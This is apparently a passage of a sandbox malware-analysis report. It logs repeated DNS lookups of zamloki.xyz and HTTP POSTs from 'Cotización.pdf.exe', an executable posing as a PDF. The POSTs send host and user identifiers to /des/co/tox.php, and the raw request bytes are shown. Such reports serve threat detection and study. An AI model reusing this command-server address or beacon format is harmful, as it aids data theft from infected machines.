                                      Jul 15, 2021 12:44:23.161600113 CEST8.8.8.8192.168.2.30x62ebNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:23.693172932 CEST8.8.8.8192.168.2.30x36daNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:23.693172932 CEST8.8.8.8192.168.2.30x36daNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:24.224226952 CEST8.8.8.8192.168.2.30xc2d3No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:24.224226952 CEST8.8.8.8192.168.2.30xc2d3No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:24.758142948 CEST8.8.8.8192.168.2.30xaab3No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:24.758142948 CEST8.8.8.8192.168.2.30xaab3No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:25.261136055 CEST8.8.8.8192.168.2.30x6618No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:25.261136055 CEST8.8.8.8192.168.2.30x6618No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:25.753865004 CEST8.8.8.8192.168.2.30xcaffNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:25.753865004 CEST8.8.8.8192.168.2.30xcaffNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:26.327507019 CEST8.8.8.8192.168.2.30x272dNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:26.327507019 CEST8.8.8.8192.168.2.30x272dNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:26.875633001 CEST8.8.8.8192.168.2.30xf5e5No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:26.875633001 CEST8.8.8.8192.168.2.30xf5e5No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:27.423202991 CEST8.8.8.8192.168.2.30x6749No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:27.423202991 CEST8.8.8.8192.168.2.30x6749No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:27.998087883 CEST8.8.8.8192.168.2.30x5269No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:27.998087883 CEST8.8.8.8192.168.2.30x5269No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:28.547930002 CEST8.8.8.8192.168.2.30xb0d1No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:28.547930002 CEST8.8.8.8192.168.2.30xb0d1No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:29.379895926 CEST8.8.8.8192.168.2.30x9704No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:29.379895926 CEST8.8.8.8192.168.2.30x9704No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:29.941210032 CEST8.8.8.8192.168.2.30xeadfNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:29.941210032 CEST8.8.8.8192.168.2.30xeadfNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:30.782937050 CEST8.8.8.8192.168.2.30x728cNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:30.782937050 CEST8.8.8.8192.168.2.30x728cNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:31.288299084 CEST8.8.8.8192.168.2.30x8536No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:31.288299084 CEST8.8.8.8192.168.2.30x8536No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:31.806317091 CEST8.8.8.8192.168.2.30xad7eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:31.806317091 CEST8.8.8.8192.168.2.30xad7eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:32.341964960 CEST8.8.8.8192.168.2.30xf57eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:32.341964960 CEST8.8.8.8192.168.2.30xf57eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:32.887413979 CEST8.8.8.8192.168.2.30xdee3No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:32.887413979 CEST8.8.8.8192.168.2.30xdee3No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:33.413608074 CEST8.8.8.8192.168.2.30x1c00No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:33.413608074 CEST8.8.8.8192.168.2.30x1c00No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:33.927614927 CEST8.8.8.8192.168.2.30x3614No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:33.927614927 CEST8.8.8.8192.168.2.30x3614No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:34.435470104 CEST8.8.8.8192.168.2.30x1231No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:34.435470104 CEST8.8.8.8192.168.2.30x1231No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:34.962716103 CEST8.8.8.8192.168.2.30xb574No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:34.962716103 CEST8.8.8.8192.168.2.30xb574No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:35.482784986 CEST8.8.8.8192.168.2.30x88feNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:35.482784986 CEST8.8.8.8192.168.2.30x88feNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:36.084111929 CEST8.8.8.8192.168.2.30x40a2No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:36.084111929 CEST8.8.8.8192.168.2.30x40a2No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:36.600025892 CEST8.8.8.8192.168.2.30x3f1dNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:36.600025892 CEST8.8.8.8192.168.2.30x3f1dNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:37.115880966 CEST8.8.8.8192.168.2.30x1ec5No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:37.115880966 CEST8.8.8.8192.168.2.30x1ec5No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:37.768765926 CEST8.8.8.8192.168.2.30xeaaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:37.768765926 CEST8.8.8.8192.168.2.30xeaaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:38.287544012 CEST8.8.8.8192.168.2.30xcb95No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:38.287544012 CEST8.8.8.8192.168.2.30xcb95No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:38.817277908 CEST8.8.8.8192.168.2.30x35e5No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:38.817277908 CEST8.8.8.8192.168.2.30x35e5No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:39.378170013 CEST8.8.8.8192.168.2.30xb7abNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:39.378170013 CEST8.8.8.8192.168.2.30xb7abNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:40.188589096 CEST8.8.8.8192.168.2.30x339No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:40.188589096 CEST8.8.8.8192.168.2.30x339No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:40.823302031 CEST8.8.8.8192.168.2.30x403fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:40.823302031 CEST8.8.8.8192.168.2.30x403fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:41.895956993 CEST8.8.8.8192.168.2.30xdcaaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:41.895956993 CEST8.8.8.8192.168.2.30xdcaaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:43.175436020 CEST8.8.8.8192.168.2.30xf2faNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:43.175436020 CEST8.8.8.8192.168.2.30xf2faNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:43.717622042 CEST8.8.8.8192.168.2.30xf3ccNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:43.717622042 CEST8.8.8.8192.168.2.30xf3ccNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:44.216659069 CEST8.8.8.8192.168.2.30x2defNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:44.216659069 CEST8.8.8.8192.168.2.30x2defNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:44.714206934 CEST8.8.8.8192.168.2.30xf429No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:44.714206934 CEST8.8.8.8192.168.2.30xf429No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:45.232325077 CEST8.8.8.8192.168.2.30x4e8fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:45.232325077 CEST8.8.8.8192.168.2.30x4e8fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:45.764659882 CEST8.8.8.8192.168.2.30x2281No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:45.764659882 CEST8.8.8.8192.168.2.30x2281No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:46.280395985 CEST8.8.8.8192.168.2.30xb936No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:46.280395985 CEST8.8.8.8192.168.2.30xb936No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:46.779916048 CEST8.8.8.8192.168.2.30x6675No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:46.779916048 CEST8.8.8.8192.168.2.30x6675No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:47.298109055 CEST8.8.8.8192.168.2.30xe4d9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:47.298109055 CEST8.8.8.8192.168.2.30xe4d9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:47.851485014 CEST8.8.8.8192.168.2.30xaf41No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:47.851485014 CEST8.8.8.8192.168.2.30xaf41No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:48.387482882 CEST8.8.8.8192.168.2.30x627fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:48.387482882 CEST8.8.8.8192.168.2.30x627fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:48.888705969 CEST8.8.8.8192.168.2.30xe1ddNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:48.888705969 CEST8.8.8.8192.168.2.30xe1ddNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:49.424396992 CEST8.8.8.8192.168.2.30x5257No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:49.424396992 CEST8.8.8.8192.168.2.30x5257No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:49.917669058 CEST8.8.8.8192.168.2.30xf89No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:49.917669058 CEST8.8.8.8192.168.2.30xf89No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:50.431998968 CEST8.8.8.8192.168.2.30x184No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:50.431998968 CEST8.8.8.8192.168.2.30x184No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:50.970931053 CEST8.8.8.8192.168.2.30x32aaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:50.970931053 CEST8.8.8.8192.168.2.30x32aaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:51.504997969 CEST8.8.8.8192.168.2.30x88beNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:51.504997969 CEST8.8.8.8192.168.2.30x88beNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:52.013833046 CEST8.8.8.8192.168.2.30x1429No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:52.013833046 CEST8.8.8.8192.168.2.30x1429No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:52.554482937 CEST8.8.8.8192.168.2.30x6d1aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:52.554482937 CEST8.8.8.8192.168.2.30x6d1aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:53.052774906 CEST8.8.8.8192.168.2.30xe52aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:53.052774906 CEST8.8.8.8192.168.2.30xe52aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:53.586507082 CEST8.8.8.8192.168.2.30xdca6No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:53.586507082 CEST8.8.8.8192.168.2.30xdca6No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:54.095200062 CEST8.8.8.8192.168.2.30x1ef7No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:54.095200062 CEST8.8.8.8192.168.2.30x1ef7No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:54.673021078 CEST8.8.8.8192.168.2.30x53c9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:54.673021078 CEST8.8.8.8192.168.2.30x53c9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:55.169157982 CEST8.8.8.8192.168.2.30xf973No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:55.169157982 CEST8.8.8.8192.168.2.30xf973No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:55.684447050 CEST8.8.8.8192.168.2.30x141cNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:55.684447050 CEST8.8.8.8192.168.2.30x141cNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:56.184940100 CEST8.8.8.8192.168.2.30x18c0No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:56.184940100 CEST8.8.8.8192.168.2.30x18c0No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:56.691792965 CEST8.8.8.8192.168.2.30x392aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:56.691792965 CEST8.8.8.8192.168.2.30x392aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:57.184271097 CEST8.8.8.8192.168.2.30xde0bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:57.184271097 CEST8.8.8.8192.168.2.30xde0bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:57.705969095 CEST8.8.8.8192.168.2.30xc651No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:57.705969095 CEST8.8.8.8192.168.2.30xc651No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:58.240128994 CEST8.8.8.8192.168.2.30x131bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:58.240128994 CEST8.8.8.8192.168.2.30x131bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:58.775551081 CEST8.8.8.8192.168.2.30x7020No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:58.775551081 CEST8.8.8.8192.168.2.30x7020No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:59.289829969 CEST8.8.8.8192.168.2.30xbe25No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:59.289829969 CEST8.8.8.8192.168.2.30xbe25No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:59.785984993 CEST8.8.8.8192.168.2.30xaf5cNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:59.785984993 CEST8.8.8.8192.168.2.30xaf5cNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:00.288418055 CEST8.8.8.8192.168.2.30x2487No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:00.288418055 CEST8.8.8.8192.168.2.30x2487No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:00.812108994 CEST8.8.8.8192.168.2.30xe10bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:00.812108994 CEST8.8.8.8192.168.2.30xe10bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:01.345877886 CEST8.8.8.8192.168.2.30x817No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:01.345877886 CEST8.8.8.8192.168.2.30x817No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:01.953919888 CEST8.8.8.8192.168.2.30x9d12No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:01.953919888 CEST8.8.8.8192.168.2.30x9d12No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:02.735788107 CEST8.8.8.8192.168.2.30x651cNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:02.735788107 CEST8.8.8.8192.168.2.30x651cNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:03.686865091 CEST8.8.8.8192.168.2.30xa92dNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:03.686865091 CEST8.8.8.8192.168.2.30xa92dNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:04.376971960 CEST8.8.8.8192.168.2.30xce58No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:04.376971960 CEST8.8.8.8192.168.2.30xce58No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:04.906169891 CEST8.8.8.8192.168.2.30x80caNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:04.906169891 CEST8.8.8.8192.168.2.30x80caNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:05.437347889 CEST8.8.8.8192.168.2.30x6dfNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:05.437347889 CEST8.8.8.8192.168.2.30x6dfNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:06.013479948 CEST8.8.8.8192.168.2.30x2b0eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:06.013479948 CEST8.8.8.8192.168.2.30x2b0eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • zamloki.xyz

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.349725104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:47.907135010 CEST1366OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 190
                                      Connection: close
                                      Jul 15, 2021 12:43:47.926115990 CEST1367OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: 'ckav.ruhardz618321DESKTOP-716T771k08F9C4E9C79A3B52B3F739430z5vPS
                                      Jul 15, 2021 12:43:48.175553083 CEST1367INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:48 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UtkG5wpiD%2F39c8b7n4kaE%2FNjjz%2FBg3gKdVgGRzXN7iIbRlKskSNIhlBnfCTz8kVwtZbZgK0RonfV5wGfYj9GDZNJdxqTxagwVfZjl4sYIsLo4YH7t2RMaK%2F2Tstsig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26450793b1762-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.349726172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:48.439977884 CEST1368OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 190
                                      Connection: close
                                      Jul 15, 2021 12:43:48.459628105 CEST1369OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: 'ckav.ruhardz618321DESKTOP-716T771+08F9C4E9C79A3B52B3F739430dadvy
                                      Jul 15, 2021 12:43:48.712553978 CEST1369INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:48 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=rnVcOd%2BhfbyQYvcGAH6h9j6b4ubsrABB3STzn7XoVenpi6HkeYwITOj3QM3xsUTskL8LEHmh171L2%2FY6QaRw6CYEzAaQ5%2BYNW5yzwAzEbNfrx38OW1%2FCx7g%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26453dc0216ee-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      10192.168.2.349735104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:55.280241013 CEST1386OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:55.301932096 CEST1386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:55.547267914 CEST1387INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:55 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
